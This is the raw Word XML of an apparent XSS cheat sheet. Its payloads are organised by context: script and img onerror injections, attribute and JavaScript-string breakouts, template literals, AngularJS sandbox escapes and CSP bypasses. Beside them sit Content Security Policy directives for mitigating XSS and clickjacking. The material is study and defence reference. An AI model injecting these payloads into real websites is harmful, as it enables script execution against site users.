                            <a:gd name="T42" fmla="+- 0 260 78"/>
                            <a:gd name="T43" fmla="*/ 260 h 183"/>
                            <a:gd name="T44" fmla="+- 0 2869 1979"/>
                            <a:gd name="T45" fmla="*/ T44 w 912"/>
                            <a:gd name="T46" fmla="+- 0 260 78"/>
                            <a:gd name="T47" fmla="*/ 260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12" h="183">
                              <a:moveTo>
                                <a:pt x="890" y="182"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="21" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="18" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="15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890" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="911" y="21"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="911" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="893" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="890" y="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55502" id="Freeform 6" o:spid="_x0000_s1026" style="position:absolute;margin-left:98.95pt;margin-top:3.9pt;width:45.6pt;height:9.15pt;z-index:-174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" path="m890,182r-869,l18,182,,161r,-3l,21,21,,890,r21,21l911,161r-18,21l890,182xe" fillcolor="#f5f5f5" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="565150,165100;13335,165100;11430,165100;0,151765;0,149860;0,62865;13335,49530;565150,49530;578485,62865;578485,151765;567055,165100;565150,165100" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>${alert``}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:spacing w:val="-55"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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trailing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>backticks.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF5896" w:rsidRDefault="00EF5896" w:rsidP="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr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48787148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152400</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="4" name="Serbest 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776 1748"/>
                            <a:gd name="T1" fmla="*/ T0 w 49"/>
                            <a:gd name="T2" fmla="+- 0 289 240"/>
                            <a:gd name="T3" fmla="*/ 289 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 289 240"/>
                            <a:gd name="T7" fmla="*/ 289 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 288 240"/>
                            <a:gd name="T11" fmla="*/ 288 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 268 240"/>
                            <a:gd name="T15" fmla="*/ 268 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 261 240"/>
                            <a:gd name="T19" fmla="*/ 261 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 240 240"/>
                            <a:gd name="T23" fmla="*/ 240 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 240 240"/>
                            <a:gd name="T27" fmla="*/ 240 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 264 240"/>
                            <a:gd name="T31" fmla="*/ 264 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 268 240"/>
                            <a:gd name="T35" fmla="*/ 268 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 289 240"/>
                            <a:gd name="T39" fmla="*/ 289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8" y="49"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="21" y="49"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="18" y="48"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="28"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="21"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="21" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="28" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="49" y="24"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="49" y="28"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="28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F2B36" id="Serbest Form 4" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:12pt;width:2.45pt;height:2.45pt;z-index:-1544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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,183515;13335,183515;11430,182880;0,170180;0,165735;13335,152400;17780,152400;31115,167640;31115,170180;17780,18351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487872512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106045</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="525145" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1" name="Gr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116205"/>
                          <a:chOff x="1930" y="167"/>
                          <a:chExt cx="827" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2" name="Freeform 1418"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="167"/>
                            <a:ext cx="827" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2735 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 827"/>
                              <a:gd name="T2" fmla="+- 0 349 167"/>
                              <a:gd name="T3" fmla="*/ 349 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 827"/>
                              <a:gd name="T6" fmla="+- 0 349 167"/>
                              <a:gd name="T7" fmla="*/ 349 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 827"/>
                              <a:gd name="T10" fmla="+- 0 349 167"/>
                              <a:gd name="T11" fmla="*/ 349 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 827"/>
                              <a:gd name="T14" fmla="+- 0 328 167"/>
                              <a:gd name="T15" fmla="*/ 328 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 827"/>
                              <a:gd name="T18" fmla="+- 0 325 167"/>
                              <a:gd name="T19" fmla="*/ 325 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 827"/>
                              <a:gd name="T22" fmla="+- 0 188 167"/>
                              <a:gd name="T23" fmla="*/ 188 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 827"/>
                              <a:gd name="T26" fmla="+- 0 167 167"/>
                              <a:gd name="T27" fmla="*/ 167 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2735 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 827"/>
                              <a:gd name="T30" fmla="+- 0 167 167"/>
                              <a:gd name="T31" fmla="*/ 167 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2756 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 827"/>
                              <a:gd name="T34" fmla="+- 0 188 167"/>
                              <a:gd name="T35" fmla="*/ 188 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2756 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 827"/>
                              <a:gd name="T38" fmla="+- 0 328 167"/>
                              <a:gd name="T39" fmla="*/ 328 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2739 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 827"/>
                              <a:gd name="T42" fmla="+- 0 349 167"/>
                              <a:gd name="T43" fmla="*/ 349 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2735 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 827"/>
                              <a:gd name="T46" fmla="+- 0 349 167"/>
                              <a:gd name="T47" fmla="*/ 34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27" h="183">
                                <a:moveTo>
                                  <a:pt x="805" y="182"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="158"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="21" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="805" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="826" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="826" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="809" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="805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Text Box 141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167"/>
                            <a:ext cx="82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5896" w:rsidRDefault="00EF5896" w:rsidP="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="27"/>
                                <w:ind w:left="30"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:sz w:val="15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6454E"/>
                                  <w:w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>(alert())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 1" o:spid="_x0000_s2304" style="position:absolute;margin-left:96.5pt;margin-top:8.35pt;width:41.35pt;height:9.15pt;z-index:-15443968;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,167" coordsize="827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">
                <v:shape id="Freeform 1418" o:spid="_x0000_s2305" style="position:absolute;left:1930;top:167;width:827;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="82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tTsIA&#10;AADaAAAADwAAAGRycy9kb3ducmV2LnhtbESPzarCMBSE94LvEI7gRjS1i4tWo/iDXBdurCIuD82x&#10;LTYnpYna+/bmguBymJlvmPmyNZV4UuNKywrGowgEcWZ1ybmC82k3nIBwHlljZZkU/JGD5aLbmWOi&#10;7YuP9Ex9LgKEXYIKCu/rREqXFWTQjWxNHLybbQz6IJtc6gZfAW4qGUfRjzRYclgosKZNQdk9fRgF&#10;h/U2n+4uv/4q4/N0cL+uUWdHpfq9djUD4an13/CnvdcKYvi/Em6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RC1OwgAAANoAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m805,182r-784,l18,182,,161r,-3l,21,21,,805,r21,21l826,161r-17,21l805,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="805,349;21,349;18,349;0,328;0,325;0,188;21,167;805,167;826,188;826,328;809,349;805,349" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1419" o:spid="_x0000_s2306" type="#_x0000_t202" style="position:absolute;left:1930;top:167;width:827;height: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IywMMA&#10;AADaAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IEb3VjB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IywMMAAADaAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00EF5896" w:rsidRDefault="00EF5896" w:rsidP="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="27"/>
                          <w:ind w:left="30"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>(alert())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F5896" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="72"/>
        <w:ind w:left="464"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF5896" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF5896" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF5896" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">XSS between HTML tags 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>&lt;script&gt;alert(document.domain)&lt;/script&gt;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ind w:left="2124" w:firstLine="708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&lt;img src=1 onerror=alert(1)&gt;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XSS in HTML tag attributes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>"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;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ind w:left="2124" w:firstLine="708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" autofocus onfocus=alert(document.domain) x="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ind w:left="2124" w:firstLine="708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&lt;a href="javascript:alert(document.domain)"&gt;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Terminating the existing script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>&lt;/script&gt;&lt;img src=1 onerror=alert(document.domain)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF5896" w:rsidRPr="00EF5896" w:rsidRDefault="00EF5896" w:rsidP="00EF5896">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="333332"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="tr-TR" w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF5896">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="333332"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="tr-TR" w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Breaking out of a JavaScript string</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF5896">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="333332"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="tr-TR" w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EF5896">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="333332"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="tr-TR" w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:tab/>
        <w:t>'-alert(document.domain)-'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ind w:left="2124" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="333332"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="tr-TR" w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF5896">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="333332"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="tr-TR" w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>';alert(document.domain)//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ind w:left="2124" w:firstLine="708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onerror=alert;throw 1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Making use of HTML-encoding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>&amp;apos;-alert(document.domain)-&amp;apos;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XSS in JavaScript template literals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>${alert(document.domain)}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AngularJS sandbox escape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>'a'.constructor.prototype.charAt=[].join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advanced AngularJS sandbox escape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>[123]|orderBy:'Some string'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 xml:space="preserve">Bypassing a CSP with an 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AngularJS sandbox escape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 xml:space="preserve"> [1].map(alert)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Mitigating XSS attacks using CSP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>script-src 'self'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 xml:space="preserve">This directive will only allow scripts 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to be loaded from a specific domain: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>script-src https://scripts.normal-website.com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Mitigating dangling markup attacks using CSP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>img-src 'self'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 xml:space="preserve">This directive will only allow images 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to be loaded from a specific domain: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>img-src</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00EF5896">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://images.normal-website.com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Protecting against </w:t>
      </w:r>
      <w:hyperlink r:id="rId94" w:history="1">
        <w:r w:rsidRPr="00EF5896">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:color w:val="0563C1"/>
            <w:sz w:val="12"/>
            <w:szCs w:val="12"/>
            <w:u w:val="single"/>
            <w:lang w:val="tr-TR"/>
          </w:rPr>
          <w:t>clickjacking</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EF5896">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t> using CSP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The following directive will only allow the page to be framed by other pages from the same origin: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>frame-ancestors 'self'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The following directive will prevent framing altogether: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>frame-ancestors 'none'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Using content security policy to prevent clickjacking is more flexible than using the X-Frame-Options header because you can specify multiple domains and use wildcards. For example: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ind w:left="2832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frame-ancestors 'self' https://normal-website.com https://*.robust-website.com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Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>AngularJS defines a special </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF5896">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Calibri" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>$event</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t> object, which simply references the browser event object. You can use this object to perform a CSP bypass. On Chrome, there is a special property on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF5896">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Calibri" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>$event/event</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t> object called </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF5896">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Calibri" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w: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</w:p>
    <w:p w:rsidR="00EF5896" w:rsidRPr="00EF5896" w:rsidRDefault="00EF5896" w:rsidP="00EF5896">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF5896">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>payload:</w:t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</w:r>
      <w:r w:rsidRPr="00EF5896">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> {{$on.constructor('alert(1)')()}} execution in page: &lt;h1&gt;0 search results for' {{$on.constructor(&amp;apos;alert(1)&amp;apos;)()}} '&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF5896" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF5896" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00EF5896">
      <w:pgSz w:w="11920" w:h="16860"/>
      <w:pgMar w:top="1360" w:right="1440" w:bottom="280" w:left="146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altName w:val="Roboto"/>
    <w:panose1 w:val="02000000000000000000"/>
    <w:charset w:val="A2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Roboto Lt">
    <w:altName w:val="Times New Roman"/>
    <w:charset w:val="01"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Lucida Console">
    <w:altName w:val="Lucida Console"/>
    <w:panose1 w:val="020B0609040504020204"/>
    <w:charset w:val="A2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D03BE0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="70FCE79C"/>
    <w:lvl w:ilvl="0" w:tplc="D5386DE4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1505" w:hanging="1217"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto" w:hint="default"/>
        <w:w w:val="101"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1B1ED18A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2251" w:hanging="1217"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="54D4D742">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3003" w:hanging="1217"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="AF0CDD90">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3755" w:hanging="1217"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
